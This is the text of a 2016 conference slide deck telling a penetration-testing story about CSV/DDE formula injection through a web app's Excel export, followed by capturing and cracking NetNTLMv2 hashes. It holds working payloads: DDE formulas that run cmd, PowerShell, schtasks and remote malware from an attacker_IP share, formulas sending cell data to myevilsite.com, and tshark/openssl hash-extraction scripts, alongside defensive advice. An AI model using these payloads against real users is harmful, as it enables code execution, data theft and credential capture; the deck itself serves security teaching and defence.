From CSV to CMD to qwertyA pentesting war story

Jerome Smith

BSides MCR August 2016

whoami

• In computer security for y years• Pentester for p years• At NCC Group for n years• Where y 2p and p 2n and 2n + 5 y

• CREST CCT (App)• Presented at first BSides MCR “SSL Checklist for Pentesters”

• exploresecurity.com | @exploresecurity

2

Based on a true story...

The story, characters, and incidents portrayed in this presentation are real.

Any similarity to actual events is completely intentional.

Some details have been changed for the sake of anonymity.

If you can identify any actual persons, places, buildings or products then I’m in trouble so keep it to yourself.

3

Plot

1. Web application with Excel export

2. Command execution on users’ machines (from CSV to

CMD…)

3. Grabbing hashes from low-level users

4. Cracking hashes (…to

qwerty)

5. Chase bugs

6. Can we improve the attack?• Why do we get these warnings?• Can we do anything to stop them?

4

5

Setting the scene

Background• Global business in finance sector• IIS 6.0• Classic ASP• What could possibly go wrong?

Excel export• Request data• Click export to Excel• Returned JavaScript to build a form• Form POSTed to another page to return the Excel file

6

Final POST

An extreme example of Excel export at work

But, more generally,

export of user-supplied input to Excel files is not uncommon

7

Export to Excel page

Reflection of user input• Request:

http://app/excel.asp?p=hello+world• Returned:

HTTP/1.1 200 OKContent-Type: text/htmlContent-Disposition: attachment; filename="ExcelOuput-46373.xls"Cache-control: public

hello world

Attack scenarios• Spoof data (deceive victim)• Exploit Excel vulnerabilities• OS command executionIn general, caching of file

downloads is often less secure

Exploit Excel vulnerabilities?

8

9

0x01 – 0xFF

10

OS command execution

Dynamic Data Exchange (DDE)

• Old Microsoft technology to facilitate data transfer between applications• A form of Inter-Process Communication (IPC)

• Security risks of Excel export first widely publicised by @albinowaxhttp://www.contextis.com/resources/blog/comma-separated-vulnerabilities/

• Consider:http://app/excel.asp?p=%3dcmd|'%2fk+ipconfig'!A0

• Returns the “XLS” file:=cmd|'/k ipconfig'!A0service | topic ! item

11

Warnings

Why wouldn’t it be secure?

The file came from our finance app and I requested it!

12

Command execution

cmd /k persists the window for a screenshotOtherwise it runs in a minimised window and exits

13

Domain credentials

• Now how about:• cmd /c \\<attacker_IP\evil$\malware.exe• cmd /c net use \\<attacker_IP>\c$• An ISP should block outbound SMB ports but we’re inside, remember

• Domain user account, no pentest laptop …• But another corporate workstation had Wireshark on it

Domain\username for free

14

Cracking NTLMv2 – John

http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats

username:$NETNTLMv2$domain$challenge$HMAC-MD5$blobsmithjer:$NETNTLMv2$domain$challenge$HMAC-MD5$blob

15

NTLM authentication

Challenge-response1. Client → Server (Type 1, negotiation) Features supported by the client and requested of the server2. Server → Client (Type 2, challenge) Features supported and agreed upon by the server + a challenge3. Client → Server (Type 3, authentication). More information about the client + response(s)

NTLM vs NTLMv2• All about the calculation of the response• NTLM: MD4 and DES (weak)• NTLMv2: HMAC-MD5 (input > password & challenge, hence “blob”)

16

Type 1 message

Type 1 (negotiation)

Client OS (Windows 7)N.B. little endian: dec7601 = 0x1DB1

Wireshark filter

“ntlmssp”

17

Type 2 message

Type 2 (challenge)

Challenge Indicates NTLMv2A block of name-value pairs

Info leakage (server)

18

Wireshark extract bytes

smithjer:$NETNTLMv2$domain$36edff8376e59e18$HMAC-MD5$blob

19

Type 3 message

Domain and username

Looks like NTLMv2No LM

Type 3 (authentication)

20

Type 3 message – drill-down

HMAC-MD5

The “blob” is everything after the HMAC in the “NTLM Response tree”• Includes client nonce, timestamp, server’s Target Info block… • Copy NTLM Response bytes, remove first 16 bytes (HMAC) • Likely to start 0x01010000

See, I told you it was v2 ;-)

blob

21

Let’s get cracking

smithjer:$NETNTLMv2$domain$36edff8376e59e18$4f68b56e9ce788d010f58b4f049b5c7f$0101000000000000295779de01bbd001b6f…

“An attacker with more time and resources…”

John

Hashcat

22

Wait a minute...

• Tried hashcat test case for NTLMv2… admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958... Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts• Tried the same hashcat test case with John – didn’t work• Tried the smithjer hash on a GPU-based rig… Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts• Tried the smithjer hash with John in hashcat format – it worked!• So I got my PoC in the report but why the mixed results?

23

It’s time to activate...

24

John (the Ripper, not Stuart Mill)

Hash cracked Hash didn’t crackusername::domain:challenge:HMAC-MD5:blob

username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob

• Even though John was identifying the hash…Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])

…it wasn’t processing it correctly• John wanted the hashcat format

• To be fair to pentestmonkey, the cheatsheet was…“originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page”

25

Hashcat

Hash Cracked Didn’t crack

admin (test) admin:...:blob[53 bytes]

smithjer:...:blob[360 bytes]

smithjer oclHashcat (Linux) hashcat (Windows)

catflap• Extracts NTLMv2 exchange from Wireshark capture file catflap <capture_file>• Recalculates NTLMv2 response with given password catflap <capture_file | hashcat_file> <password>

• Allows experiments with other inputs, i.e. the “blob”• A more faithful check than the standard admin test hash

26

Demo

Hashcat had a bug• Wasn’t handling “blobs” above a certain size• Didn’t affect oclHashcat• Didn’t affect hashcat on Linux (1)

Fixed in hashcat version 3

Can we improve the attack?- i.e cut out some of those warnings?

28

“Standard” warnings

(1)

(2a)

(3)

(2b)

Users and warnings – Piranha

44% clicked through warnings

70% clicked through warnings

75% clicked through warnings

30

Source of warnings

• Setting is a property of the file• Only effective if file has been trusted previously• Two stage attack (low and slow)?

• Benign payload =NotASheet!A1• Malicious payload

31

Trusted Documents

(1)

(2a)

Only the filename is storedDownloads with static filenames are of interest

Once “trusted” if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed

32

Excel file format

XLSX vs XLS vs CSV• Not something you always have control over• CSV: no Protected View warning• CSV: can’t contain start-up prompt auto-update setting

CSV format in XLS file• Format warning instead of Protected View warning• Formal security warnings (1) and (2a) not shown

• Therefore file cannot be not “trusted” in the registry• Curiously CSV format not supported: tab or CRLF cell delimiter

33

That CMD.EXE warning

Built-in Excel functions• Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here")

• Limited info about the system e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE")

• =WEBSERVICE(URL)• Sadly doesn’t support authentication (i.e. force NTLM authentication)• Or file paths (local or UNC) or file://• But it will steal data without user interaction (unlike HYPERLINK) =WEBSERVICE("http://myevilsite.com/?data="&A1)

• =FILTERXML(XML, XPATH)• Any XXE or parsing bugs?

34

Alternatives to cmd.exe

• =powershell|'Test-Connection 127.0.0.1'!A0

Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula =cmd|'/k powershell Test-Connection 127.0.0.1'!A0

PATHEXT environment variable ignored – .exe only• .exe files in PATH where filename <= 12 characters =explorer|'https://nccgroup.trust'!A0 =schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0 =javaws|'http://myevilsite.com/malware.jnlp'!A0 =rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0• N.B. if Excel is 32-bit, then the program will be run as such, etc.

But we’re still getting warnings about running exe files because the DDE call is failing

35

Native DDE services – 1/2

Tcl (Tool Command Language)• dde services "" ""{Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}} {Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN}

Excel• dde request excel Sheet1 r1c1:r2c3

• dde execute excel Sheet1 {[formula("overwrite","r1c1")]}• dde execute excel Sheet1 {[alert("hello")][alert("world")]}• dde execute excel Sheet1 {[file.delete("e:\test")]}• dde execute excel Sheet1 {[exec("c:\windows\system32\calc.exe")]}

36

Native DDE services – 2/2

Progman• dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]}

Folders / Shell• dde execute Folders AppProperties {[ViewFolder("","\\attacker_IP\c$",2)]}

What about in Excel?• This could save you hours: when testing, if Excel hangs, try closing Tcl• =Folders|AppProperties!'{[ViewFolder("","c:\windows\",1)]}' • That Tcl Service-Topic list wasn’t complete…

37

DDESpy

• Part of Visual Studio 6 (!)• Must be running when application launches

38

iexplore DDE

• =iexplore|WWW_OpenURL!nccgroup.com• No “remote data not accessible” warning • Slice of BeEF anyone?

• =iexplore|WWW_OpenURL!'\\<attacker_IP>\c$' (force network authentication)

• =iexplore|WWW_OpenURL!'c:\windows\system32\cmd.exe'

• No better than where we were really!• No obvious way to include switches anyway – a limitation of file://

39

firefox DDE

• =firefox|WWW_OpenURL!'http://exploresecurity.com/'• =firefox|WWW_GetWindowInfo!foo

40

Demo

(1) No Protective View warning as CSV(2) Just “Enable Content” warning as DDE call succeeded• Background navigation to phishing site could be very effective(3) No warnings – exactly which stars were aligned there?!• A file with same name previously downloaded

• Had content to elicit warnings, which were accepted• So it’s now “trusted”• Previous file need not have been malicious – remember =NotASheet!A1

• Malicious file’s start-up prompt set to auto-update links

41

Lessons

From CSV to CMD• Check out any Excel export that returns user-supplied data• CSV is not a benign format• DDE ≠ macro• In some cases it may be possible to cut down the Excel warnings

• Excel may have more to give in this area• Progman|Shell|Folders attractive DDE targets as always running• Very much work in progress – please explore!

• All this stuff applies to red-teaming tooFrom CMD to qwerty• Use or develop test cases i.e. something you know should work• Read the errors!• “Authoritative” references can go stale

42

Defence

Original article• Prefix = with '• This will “cast” the cell as text in XLS[X] and stop execution in CSV

+cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0

=cmd|'/k ipconfig'!A0

@SUM(cmd|'/k ipconfig'!A0)

"=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0

=(cmd|'/k ipconfig'!A0)

=0-cmd|'/k ipconfig'!A0This is beginning to feel like XSS blacklisting

• Validation against a strict whitelist of “known good” (length, characters, format) should always be the go-to defensive strategy

• Otherwise e.g. for XLS[X] consider always prefixing cell with apostrophe

43

References

DDE• https://www.tcl.tk/man/tcl8.6/TclCmd/dde.htm (Tcl)• http://rpackages.ianhowson.com/rforge/tcltk2/man/windows/tk2dde.html (examples)• https://support.microsoft.com/en-us/kb/128185 (Excel XLM reference)

Hashcat test cases• http://hashcat.net/wiki/doku.php?id=example_hashes

Catflap• https://github.com/nccgroup/ (or https://github.com/exploresecurity/catflap)

NTLM deep-dive• http://davenport.sourceforge.net/ntlm.html• http://ubiqx.org/cifs/SMB.html#SMB.8• http://www.innovation.ch/personal/ronald/ntlm.html• http://hashcat.net/forum/archive/index.php?thread-2011.html• https://msdn.microsoft.com/en-us/library/cc207842.aspx

44

Appendix 1: NetNTLMv2 from PCAP

Challengetshark -Y "ntlmssp.messagetype == 0x00000002" -T fields -e ntlmssp.ntlmserverchallenge

Domaintshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.domain

Usernametshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.username

HMAC-MD5tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 1-32

Blobtshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 33-

45

Appendix 2: NetNTLMv2 calculations

1. NTHASH = MD4(Unicode password)echo -n $2 | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md4 –binary | xxd –p

2. INTHASH = HMAC-MD5(Unicode uppercase username | Unicode domain, NTHASH)echo -n ${USERNAME^^}$DOMAIN | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md5 -mac HMAC -macopt hexkey:$NTHASH –binary | xxd –p

3. HMAC = HMAC-MD5(Challenge | blob, INTHASH)echo -n $CHALLENGE$BLOB | xxd -r –p | openssl dgst -md5 -mac HMAC -macopt hexkey:$INTHASH –binary | xxd -p

46

fin

You have been watching…

Jerome @exploresecurity

Script passableHairneeds cuttingMake-up requiredCostume is about the right word

Tip of the hat to James @albinowax

Cara @bones_codes

Michael Roberts

Andy @ZephrFish

Raquel Alvarez